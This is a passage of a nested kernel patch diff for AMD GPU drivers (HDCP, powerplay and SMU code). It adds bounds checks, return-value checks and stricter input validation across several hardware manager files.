++			return MOD_HDCP_STATUS_DDC_FAILURE;
++
+ 		while (buf_len > 0) {
+ 			cur_size = MIN(buf_len, HDCP_MAX_AUX_TRANSACTION_SIZE);
+ 			success = hdcp->config.ddc.funcs.write_dpcd(
+@@ -239,6 +254,11 @@ static enum mod_hdcp_status write(struct mod_hdcp *hdcp,
+ 			data_offset += cur_size;
+ 		}
+ 	} else {
++		int num_i2c_offsets = sizeof(hdcp_i2c_offsets) /
++			sizeof(hdcp_i2c_offsets[0]);
++		if (msg_id >= num_i2c_offsets)
++			return MOD_HDCP_STATUS_DDC_FAILURE;
++
+ 		hdcp->buf[0] = hdcp_i2c_offsets[msg_id];
+ 		memmove(&hdcp->buf[1], buf, buf_len);
+ 		success = hdcp->config.ddc.funcs.write_i2c(
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+index f3668911a88fd..eae4b4826f043 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/amd_powerplay.c
+@@ -99,7 +99,7 @@ static void pp_swctf_delayed_work_handler(struct work_struct *work)
+ 	struct amdgpu_device *adev = hwmgr->adev;
+ 	struct amdgpu_dpm_thermal *range =
+ 				&adev->pm.dpm.thermal;
+-	uint32_t gpu_temperature, size;
++	uint32_t gpu_temperature, size = sizeof(gpu_temperature);
+ 	int ret;
+ 
+ 	/*
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+index f4bd8e9357e22..18f00038d8441 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/pp_psm.c
+@@ -30,9 +30,8 @@ int psm_init_power_state_table(struct pp_hwmgr *hwmgr)
+ {
+ 	int result;
+ 	unsigned int i;
+-	unsigned int table_entries;
+ 	struct pp_power_state *state;
+-	int size;
++	int size, table_entries;
+ 
+ 	if (hwmgr->hwmgr_func->get_num_of_pp_table_entries == NULL)
+ 		return 0;
+@@ -40,15 +39,19 @@ int psm_init_power_state_table(struct pp_hwmgr *hwmgr)
+ 	if (hwmgr->hwmgr_func->get_power_state_size == NULL)
+ 		return 0;
+ 
+-	hwmgr->num_ps = table_entries = hwmgr->hwmgr_func->get_num_of_pp_table_entries(hwmgr);
++	table_entries = hwmgr->hwmgr_func->get_num_of_pp_table_entries(hwmgr);
+ 
+-	hwmgr->ps_size = size = hwmgr->hwmgr_func->get_power_state_size(hwmgr) +
++	size = hwmgr->hwmgr_func->get_power_state_size(hwmgr) +
+ 					  sizeof(struct pp_power_state);
+ 
+-	if (table_entries == 0 || size == 0) {
++	if (table_entries <= 0 || size == 0) {
+ 		pr_warn("Please check whether power state management is supported on this asic\n");
++		hwmgr->num_ps = 0;
++		hwmgr->ps_size = 0;
+ 		return 0;
+ 	}
++	hwmgr->num_ps = table_entries;
++	hwmgr->ps_size = size;
+ 
+ 	hwmgr->ps = kcalloc(table_entries, size, GFP_KERNEL);
+ 	if (hwmgr->ps == NULL)
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/ppatomctrl.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/ppatomctrl.c
+index f503e61faa600..cc3b62f733941 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/ppatomctrl.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/ppatomctrl.c
+@@ -73,8 +73,9 @@ static int atomctrl_retrieve_ac_timing(
+ 					j++;
+ 				} else if ((table->mc_reg_address[i].uc_pre_reg_data &
+ 							LOW_NIBBLE_MASK) == DATA_EQU_PREV) {
+-					table->mc_reg_table_entry[num_ranges].mc_data[i] =
+-						table->mc_reg_table_entry[num_ranges].mc_data[i-1];
++					if (i)
++						table->mc_reg_table_entry[num_ranges].mc_data[i] =
++							table->mc_reg_table_entry[num_ranges].mc_data[i-1];
+ 				}
+ 			}
+ 			num_ranges++;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
+index 86d6e88c73862..4f3488f4e0d05 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu10_hwmgr.c
+@@ -1036,7 +1036,9 @@ static int smu10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 
+ 	switch (type) {
+ 	case PP_SCLK:
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetGfxclkFrequency, &now);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetGfxclkFrequency, &now);
++		if (ret)
++			return ret;
+ 
+ 	/* driver only know min/max gfx_clk, Add level 1 for all other gfx clks */
+ 		if (now == data->gfx_max_freq_limit/100)
+@@ -1057,7 +1059,9 @@ static int smu10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 					i == 2 ? "*" : "");
+ 		break;
+ 	case PP_MCLK:
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetFclkFrequency, &now);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetFclkFrequency, &now);
++		if (ret)
++			return ret;
+ 
+ 		for (i = 0; i < mclk_table->count; i++)
+ 			size += sprintf(buf + size, "%d: %uMhz %s\n",
+@@ -1550,7 +1554,10 @@ static int smu10_set_fine_grain_clk_vol(struct pp_hwmgr *hwmgr,
+ 		}
+ 
+ 		if (input[0] == 0) {
+-			smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMinGfxclkFrequency, &min_freq);
++			ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMinGfxclkFrequency, &min_freq);
++			if (ret)
++				return ret;
++
+ 			if (input[1] < min_freq) {
+ 				pr_err("Fine grain setting minimum sclk (%ld) MHz is less than the minimum allowed (%d) MHz\n",
+ 					input[1], min_freq);
+@@ -1558,7 +1565,10 @@ static int smu10_set_fine_grain_clk_vol(struct pp_hwmgr *hwmgr,
+ 			}
+ 			smu10_data->gfx_actual_soft_min_freq = input[1];
+ 		} else if (input[0] == 1) {
+-			smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxGfxclkFrequency, &max_freq);
++			ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxGfxclkFrequency, &max_freq);
++			if (ret)
++				return ret;
++
+ 			if (input[1] > max_freq) {
+ 				pr_err("Fine grain setting maximum sclk (%ld) MHz is greater than the maximum allowed (%d) MHz\n",
+ 					input[1], max_freq);
+@@ -1573,10 +1583,15 @@ static int smu10_set_fine_grain_clk_vol(struct pp_hwmgr *hwmgr,
+ 			pr_err("Input parameter number not correct\n");
+ 			return -EINVAL;
+ 		}
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMinGfxclkFrequency, &min_freq);
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxGfxclkFrequency, &max_freq);
+-
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMinGfxclkFrequency, &min_freq);
++		if (ret)
++			return ret;
+ 		smu10_data->gfx_actual_soft_min_freq = min_freq;
++
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxGfxclkFrequency, &max_freq);
++		if (ret)
++			return ret;
++
+ 		smu10_data->gfx_actual_soft_max_freq = max_freq;
+ 	} else if (type == PP_OD_COMMIT_DPM_TABLE) {
+ 		if (size != 0) {
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+index 750b7527bdf83..530888c475be1 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu7_hwmgr.c
+@@ -5639,7 +5639,7 @@ static int smu7_set_power_profile_mode(struct pp_hwmgr *hwmgr, long *input, uint
+ 	mode = input[size];
+ 	switch (mode) {
+ 	case PP_SMC_POWER_PROFILE_CUSTOM:
+-		if (size < 8 && size != 0)
++		if (size != 8 && size != 0)
+ 			return -EINVAL;
+ 		/* If only CUSTOM is passed in, use the saved values. Check
+ 		 * that we actually have a CUSTOM profile by ensuring that
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+index eb744401e0567..7e11974208732 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/smu8_hwmgr.c
+@@ -584,6 +584,7 @@ static int smu8_init_uvd_limit(struct pp_hwmgr *hwmgr)
+ 				hwmgr->dyn_state.uvd_clock_voltage_dependency_table;
+ 	unsigned long clock = 0;
+ 	uint32_t level;
++	int ret;
+ 
+ 	if (NULL == table || table->count <= 0)
+ 		return -EINVAL;
+@@ -591,7 +592,9 @@ static int smu8_init_uvd_limit(struct pp_hwmgr *hwmgr)
+ 	data->uvd_dpm.soft_min_clk = 0;
+ 	data->uvd_dpm.hard_min_clk = 0;
+ 
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxUvdLevel, &level);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxUvdLevel, &level);
++	if (ret)
++		return ret;
+ 
+ 	if (level < table->count)
+ 		clock = table->entries[level].vclk;
+@@ -611,6 +614,7 @@ static int smu8_init_vce_limit(struct pp_hwmgr *hwmgr)
+ 				hwmgr->dyn_state.vce_clock_voltage_dependency_table;
+ 	unsigned long clock = 0;
+ 	uint32_t level;
++	int ret;
+ 
+ 	if (NULL == table || table->count <= 0)
+ 		return -EINVAL;
+@@ -618,7 +622,9 @@ static int smu8_init_vce_limit(struct pp_hwmgr *hwmgr)
+ 	data->vce_dpm.soft_min_clk = 0;
+ 	data->vce_dpm.hard_min_clk = 0;
+ 
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxEclkLevel, &level);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxEclkLevel, &level);
++	if (ret)
++		return ret;
+ 
+ 	if (level < table->count)
+ 		clock = table->entries[level].ecclk;
+@@ -638,6 +644,7 @@ static int smu8_init_acp_limit(struct pp_hwmgr *hwmgr)
+ 				hwmgr->dyn_state.acp_clock_voltage_dependency_table;
+ 	unsigned long clock = 0;
+ 	uint32_t level;
++	int ret;
+ 
+ 	if (NULL == table || table->count <= 0)
+ 		return -EINVAL;
+@@ -645,7 +652,9 @@ static int smu8_init_acp_limit(struct pp_hwmgr *hwmgr)
+ 	data->acp_dpm.soft_min_clk = 0;
+ 	data->acp_dpm.hard_min_clk = 0;
+ 
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxAclkLevel, &level);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetMaxAclkLevel, &level);
++	if (ret)
++		return ret;
+ 
+ 	if (level < table->count)
+ 		clock = table->entries[level].acpclk;
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+index f8333410cc3e4..c4d81c0aa18ee 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c
+@@ -355,13 +355,13 @@ static int vega10_odn_initial_default_setting(struct pp_hwmgr *hwmgr)
+ 	return 0;
+ }
+ 
+-static void vega10_init_dpm_defaults(struct pp_hwmgr *hwmgr)
++static int vega10_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega10_hwmgr *data = hwmgr->backend;
+-	int i;
+ 	uint32_t sub_vendor_id, hw_revision;
+ 	uint32_t top32, bottom32;
+ 	struct amdgpu_device *adev = hwmgr->adev;
++	int ret, i;
+ 
+ 	vega10_initialize_power_tune_defaults(hwmgr);
+ 
+@@ -486,9 +486,12 @@ static void vega10_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ 	if (data->registry_data.vr0hot_enabled)
+ 		data->smu_features[GNLD_VR0HOT].supported = true;
+ 
+-	smum_send_msg_to_smc(hwmgr,
++	ret = smum_send_msg_to_smc(hwmgr,
+ 			PPSMC_MSG_GetSmuVersion,
+ 			&hwmgr->smu_version);
++	if (ret)
++		return ret;
++
+ 		/* ACG firmware has major version 5 */
+ 	if ((hwmgr->smu_version & 0xff000000) == 0x5000000)
+ 		data->smu_features[GNLD_ACG].supported = true;
+@@ -506,10 +509,16 @@ static void vega10_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ 		data->smu_features[GNLD_PCC_LIMIT].supported = true;
+ 
+ 	/* Get the SN to turn into a Unique ID */
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
++	if (ret)
++		return ret;
++
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	if (ret)
++		return ret;
+ 
+ 	adev->unique_id = ((uint64_t)bottom32 << 32) | top32;
++	return 0;
+ }
+ 
+ #ifdef PPLIB_VEGA10_EVV_SUPPORT
+@@ -883,7 +892,9 @@ static int vega10_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 
+ 	vega10_set_features_platform_caps(hwmgr);
+ 
+-	vega10_init_dpm_defaults(hwmgr);
++	result = vega10_init_dpm_defaults(hwmgr);
++	if (result)
++		return result;
+ 
+ #ifdef PPLIB_VEGA10_EVV_SUPPORT
+ 	/* Get leakage voltage based on leakage ID. */
+@@ -2354,15 +2365,20 @@ static int vega10_acg_enable(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega10_hwmgr *data = hwmgr->backend;
+ 	uint32_t agc_btc_response;
++	int ret;
+ 
+ 	if (data->smu_features[GNLD_ACG].supported) {
+ 		if (0 == vega10_enable_smc_features(hwmgr, true,
+ 					data->smu_features[GNLD_DPM_PREFETCHER].smu_feature_bitmap))
+ 			data->smu_features[GNLD_DPM_PREFETCHER].enabled = true;
+ 
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_InitializeAcg, NULL);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_InitializeAcg, NULL);
++		if (ret)
++			return ret;
+ 
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_RunAcgBtc, &agc_btc_response);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_RunAcgBtc, &agc_btc_response);
++		if (ret)
++			agc_btc_response = 0;
+ 
+ 		if (1 == agc_btc_response) {
+ 			if (1 == data->acg_loop_state)
+@@ -2575,8 +2591,11 @@ static int vega10_init_smc_table(struct pp_hwmgr *hwmgr)
+ 		}
+ 	}
+ 
+-	pp_atomfwctrl_get_voltage_table_v4(hwmgr, VOLTAGE_TYPE_VDDC,
++	result = pp_atomfwctrl_get_voltage_table_v4(hwmgr, VOLTAGE_TYPE_VDDC,
+ 			VOLTAGE_OBJ_SVID2,  &voltage_table);
++	PP_ASSERT_WITH_CODE(!result,
++			"Failed to get voltage table!",
++			return result);
+ 	pp_table->MaxVidStep = voltage_table.max_vid_step;
+ 
+ 	pp_table->GfxDpmVoltageMode =
+@@ -3914,11 +3933,14 @@ static int vega10_get_gpu_power(struct pp_hwmgr *hwmgr,
+ 		uint32_t *query)
+ {
+ 	uint32_t value;
++	int ret;
+ 
+ 	if (!query)
+ 		return -EINVAL;
+ 
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrPkgPwr, &value);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrPkgPwr, &value);
++	if (ret)
++		return ret;
+ 
+ 	/* SMC returning actual watts, keep consistent with legacy asics, low 8 bit as 8 fractional bits */
+ 	*query = value << 8;
+@@ -4814,14 +4836,16 @@ static int vega10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 	uint32_t gen_speed, lane_width, current_gen_speed, current_lane_width;
+ 	PPTable_t *pptable = &(data->smc_state_table.pp_table);
+ 
+-	int i, now, size = 0, count = 0;
++	int i, ret, now, size = 0, count = 0;
+ 
+ 	switch (type) {
+ 	case PP_SCLK:
+ 		if (data->registry_data.sclk_dpm_key_disabled)
+ 			break;
+ 
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentGfxclkIndex, &now);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentGfxclkIndex, &now);
++		if (ret)
++			break;
+ 
+ 		if (hwmgr->pp_one_vf &&
+ 		    (hwmgr->dpm_level == AMD_DPM_FORCED_LEVEL_PROFILE_PEAK))
+@@ -4837,7 +4861,9 @@ static int vega10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 		if (data->registry_data.mclk_dpm_key_disabled)
+ 			break;
+ 
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentUclkIndex, &now);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentUclkIndex, &now);
++		if (ret)
++			break;
+ 
+ 		for (i = 0; i < mclk_table->count; i++)
+ 			size += sprintf(buf + size, "%d: %uMhz %s\n",
+@@ -4848,7 +4874,9 @@ static int vega10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 		if (data->registry_data.socclk_dpm_key_disabled)
+ 			break;
+ 
+-		smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentSocclkIndex, &now);
++		ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_GetCurrentSocclkIndex, &now);
++		if (ret)
++			break;
+ 
+ 		for (i = 0; i < soc_table->count; i++)
+ 			size += sprintf(buf + size, "%d: %uMhz %s\n",
+@@ -4859,8 +4887,10 @@ static int vega10_print_clock_levels(struct pp_hwmgr *hwmgr,
+ 		if (data->registry_data.dcefclk_dpm_key_disabled)
+ 			break;
+ 
+-		smum_send_msg_to_smc_with_parameter(hwmgr,
++		ret = smum_send_msg_to_smc_with_parameter(hwmgr,
+ 				PPSMC_MSG_GetClockFreqMHz, CLK_DCEFCLK, &now);
++		if (ret)
++			break;
+ 
+ 		for (i = 0; i < dcef_table->count; i++)
+ 			size += sprintf(buf + size, "%d: %uMhz %s\n",
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
+index 1069eaaae2f82..e4948a1184752 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega12_hwmgr.c
+@@ -294,12 +294,12 @@ static int vega12_set_features_platform_caps(struct pp_hwmgr *hwmgr)
+ 	return 0;
+ }
+ 
+-static void vega12_init_dpm_defaults(struct pp_hwmgr *hwmgr)
++static int vega12_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega12_hwmgr *data = (struct vega12_hwmgr *)(hwmgr->backend);
+ 	struct amdgpu_device *adev = hwmgr->adev;
+ 	uint32_t top32, bottom32;
+-	int i;
++	int i, ret;
+ 
+ 	data->smu_features[GNLD_DPM_PREFETCHER].smu_feature_id =
+ 			FEATURE_DPM_PREFETCHER_BIT;
+@@ -365,10 +365,16 @@ static void vega12_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ 	}
+ 
+ 	/* Get the SN to turn into a Unique ID */
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
++	if (ret)
++		return ret;
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	if (ret)
++		return ret;
+ 
+ 	adev->unique_id = ((uint64_t)bottom32 << 32) | top32;
++
++	return 0;
+ }
+ 
+ static int vega12_set_private_data_based_on_pptable(struct pp_hwmgr *hwmgr)
+@@ -411,7 +417,11 @@ static int vega12_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 
+ 	vega12_set_features_platform_caps(hwmgr);
+ 
+-	vega12_init_dpm_defaults(hwmgr);
++	result = vega12_init_dpm_defaults(hwmgr);
++	if (result) {
++		pr_err("%s failed\n", __func__);
++		return result;
++	}
+ 
+ 	/* Parse pptable data read from VBIOS */
+ 	vega12_set_private_data_based_on_pptable(hwmgr);
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+index ff77a3683efd5..89f1ed7d08c26 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega20_hwmgr.c
+@@ -329,12 +329,12 @@ static int vega20_set_features_platform_caps(struct pp_hwmgr *hwmgr)
+ 	return 0;
+ }
+ 
+-static void vega20_init_dpm_defaults(struct pp_hwmgr *hwmgr)
++static int vega20_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega20_hwmgr *data = (struct vega20_hwmgr *)(hwmgr->backend);
+ 	struct amdgpu_device *adev = hwmgr->adev;
+ 	uint32_t top32, bottom32;
+-	int i;
++	int i, ret;
+ 
+ 	data->smu_features[GNLD_DPM_PREFETCHER].smu_feature_id =
+ 			FEATURE_DPM_PREFETCHER_BIT;
+@@ -405,10 +405,17 @@ static void vega20_init_dpm_defaults(struct pp_hwmgr *hwmgr)
+ 	}
+ 
+ 	/* Get the SN to turn into a Unique ID */
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
+-	smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumTop32, &top32);
++	if (ret)
++		return ret;
++
++	ret = smum_send_msg_to_smc(hwmgr, PPSMC_MSG_ReadSerialNumBottom32, &bottom32);
++	if (ret)
++		return ret;
+ 
+ 	adev->unique_id = ((uint64_t)bottom32 << 32) | top32;
++
++	return 0;
+ }
+ 
+ static int vega20_set_private_data_based_on_pptable(struct pp_hwmgr *hwmgr)
+@@ -428,6 +435,7 @@ static int vega20_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ {
+ 	struct vega20_hwmgr *data;
+ 	struct amdgpu_device *adev = hwmgr->adev;
++	int result;
+ 
+ 	data = kzalloc(sizeof(struct vega20_hwmgr), GFP_KERNEL);
+ 	if (data == NULL)
+@@ -453,8 +461,11 @@ static int vega20_hwmgr_backend_init(struct pp_hwmgr *hwmgr)
+ 
+ 	vega20_set_features_platform_caps(hwmgr);
+ 
+-	vega20_init_dpm_defaults(hwmgr);
+-
++	result = vega20_init_dpm_defaults(hwmgr);
++	if (result) {
++		pr_err("%s failed\n", __func__);
++		return result;
++	}
+ 	/* Parse pptable data read from VBIOS */
+ 	vega20_set_private_data_based_on_pptable(hwmgr);
+ 
+@@ -4084,9 +4095,11 @@ static int vega20_set_power_profile_mode(struct pp_hwmgr *hwmgr, long *input, ui
+ 	if (power_profile_mode == PP_SMC_POWER_PROFILE_CUSTOM) {
+ 		struct vega20_hwmgr *data =
+ 			(struct vega20_hwmgr *)(hwmgr->backend);
+-		if (size == 0 && !data->is_custom_profile_set)
++
++		if (size != 10 && size != 0)
+ 			return -EINVAL;
+-		if (size < 10 && size != 0)
++
++		if (size == 0 && !data->is_custom_profile_set)
+ 			return -EINVAL;
+ 
+ 		result = vega20_get_activity_monitor_coeff(hwmgr,
+@@ -4148,6 +4161,8 @@ static int vega20_set_power_profile_mode(struct pp_hwmgr *hwmgr, long *input, ui
+ 			activity_monitor.Fclk_PD_Data_error_coeff = input[8];
+ 			activity_monitor.Fclk_PD_Data_error_rate_coeff = input[9];
+ 			break;
++		default:
++			return -EINVAL;
+ 		}
+ 
+ 		result = vega20_set_activity_monitor_coeff(hwmgr,
+diff --git a/drivers/gpu/drm/amd/pm/powerplay/smumgr/vega10_smumgr.c b/drivers/gpu/drm/amd/pm/powerplay/smumgr/vega10_smumgr.c
+index a70d738966490..f9c0f117725dd 100644
+--- a/drivers/gpu/drm/amd/pm/powerplay/smumgr/vega10_smumgr.c
++++ b/drivers/gpu/drm/amd/pm/powerplay/smumgr/vega10_smumgr.c
+@@ -130,13 +130,17 @@ int vega10_get_enabled_smc_features(struct pp_hwmgr *hwmgr,
+ 			    uint64_t *features_enabled)
+ {
+ 	uint32_t enabled_features;
++	int ret;
+ 
+ 	if (features_enabled == NULL)
+ 		return -EINVAL;
+ 
+-	smum_send_msg_to_smc(hwmgr,
++	ret = smum_send_msg_to_smc(hwmgr,
+ 			PPSMC_MSG_GetEnabledSmuFeatures,
+ 			&enabled_features);
++	if (ret)
++		return ret;
++
+ 	*features_enabled = enabled_features;
+ 
+ 	return 0;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+index ed2112efc6c68..286f4f9bfa352 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/navi10_ppt.c
+@@ -1215,19 +1215,22 @@ static int navi10_get_current_clk_freq_by_table(struct smu_context *smu,
+ 					   value);
+ }
+ 
+-static bool navi10_is_support_fine_grained_dpm(struct smu_context *smu, enum smu_clk_type clk_type)
++static int navi10_is_support_fine_grained_dpm(struct smu_context *smu, enum smu_clk_type clk_type)
+ {
+ 	PPTable_t *pptable = smu->smu_table.driver_pptable;
+ 	DpmDescriptor_t *dpm_desc = NULL;
+-	uint32_t clk_index = 0;
++	int clk_index = 0;
+ 
+ 	clk_index = smu_cmn_to_asic_specific_index(smu,
+ 						   CMN2ASIC_MAPPING_CLK,
+ 						   clk_type);
++	if (clk_index < 0)
++		return clk_index;
++
+ 	dpm_desc = &pptable->DpmDescriptor[clk_index];
+ 
+ 	/* 0 - Fine grained DPM, 1 - Discrete DPM */
+-	return dpm_desc->SnapToDiscrete == 0;
++	return dpm_desc->SnapToDiscrete == 0 ? 1 : 0;
+ }
+ 
+ static inline bool navi10_od_feature_is_supported(struct smu_11_0_overdrive_table *od_table, enum SMU_11_0_ODFEATURE_CAP cap)
+@@ -1283,7 +1286,11 @@ static int navi10_emit_clk_levels(struct smu_context *smu,
+ 		if (ret)
+ 			return ret;
+ 
+-		if (!navi10_is_support_fine_grained_dpm(smu, clk_type)) {
++		ret = navi10_is_support_fine_grained_dpm(smu, clk_type);
++		if (ret < 0)
++			return ret;
++
++		if (!ret) {
+ 			for (i = 0; i < count; i++) {
+ 				ret = smu_v11_0_get_dpm_freq_by_index(smu,
+ 								      clk_type, i, &value);
+@@ -1492,7 +1499,11 @@ static int navi10_print_clk_levels(struct smu_context *smu,
+ 		if (ret)
+ 			return size;
+ 
+-		if (!navi10_is_support_fine_grained_dpm(smu, clk_type)) {
++		ret = navi10_is_support_fine_grained_dpm(smu, clk_type);
++		if (ret < 0)
++			return ret;
++
++		if (!ret) {
+ 			for (i = 0; i < count; i++) {
+ 				ret = smu_v11_0_get_dpm_freq_by_index(smu, clk_type, i, &value);
+ 				if (ret)
+@@ -1661,7 +1672,11 @@ static int navi10_force_clk_levels(struct smu_context *smu,
+ 	case SMU_UCLK:
+ 	case SMU_FCLK:
+ 		/* There is only 2 levels for fine grained DPM */
+-		if (navi10_is_support_fine_grained_dpm(smu, clk_type)) {
++		ret = navi10_is_support_fine_grained_dpm(smu, clk_type);
++		if (ret < 0)
++			return ret;
++
++		if (ret) {
+ 			soft_max_level = (soft_max_level >= 1 ? 1 : 0);
+ 			soft_min_level = (soft_min_level >= 1 ? 1 : 0);
+ 		}
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
+index 1b731a9c92d93..c9c0aa6376e38 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/vangogh_ppt.c
+@@ -1003,6 +1003,18 @@ static int vangogh_get_dpm_ultimate_freq(struct smu_context *smu,
+ 		}
+ 	}
+ 	if (min) {
++		ret = vangogh_get_profiling_clk_mask(smu,
++						     AMD_DPM_FORCED_LEVEL_PROFILE_MIN_MCLK,
++						     NULL,
++						     NULL,
++						     &mclk_mask,
++						     &fclk_mask,
++						     &soc_mask);
++		if (ret)
++			goto failed;
++
++		vclk_mask = dclk_mask = 0;
++
+ 		switch (clk_type) {
+ 		case SMU_UCLK:
+ 		case SMU_MCLK:
+@@ -2363,6 +2375,8 @@ static u32 vangogh_set_gfxoff_residency(struct smu_context *smu, bool start)
+ 
+ 	ret = smu_cmn_send_smc_msg_with_param(smu, SMU_MSG_LogGfxOffResidency,
+ 					      start, &residency);
++	if (ret)
++		return ret;
+ 
+ 	if (!start)
